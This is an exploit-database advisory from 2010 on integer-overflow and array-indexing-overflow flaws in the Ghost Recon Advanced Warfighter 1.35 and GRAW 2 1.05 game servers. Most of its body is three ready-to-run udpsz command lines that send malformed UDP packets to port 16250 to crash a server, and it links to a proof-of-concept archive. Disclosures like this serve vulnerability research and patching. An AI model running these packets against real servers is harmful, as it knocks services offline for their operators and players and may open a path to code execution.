# Title : Ghost Recon Advanced Warfighter Integer Overflow and Array Indexing Overflow
# Published : 2010-07-08
# Author : Luigi Auriemma


Ghost Recon Advanced Warfighter (GRAW) is prone to an integer-overflow vulnerability and an array-indexing-overflow vulnerability.

Successful exploits may allow attackers to cause denial-of-service conditions. Due to the nature of these issues, code execution may also be possible, but this has not been confirmed.

GRAW 1.35 and GRAW 2 1.05 are vulnerable; other versions may also be affected. 

Integer Overflow:

udpsz -C "0100 13 0003 0000 ffffffff" -b 0x41 SERVER 16250 3000

Array Indexing Overflow:

udpsz -C "0100 0d" -X 3 8 l 0 -l 50 -b 0x41 SERVER 16250 3000

or

udpsz -C "0100 0e" -X 3 8 l 0 -l 50 -b 0x41 SERVER 16250 3000 


http://www.exploit-db.com/sploits/grawpoc.zip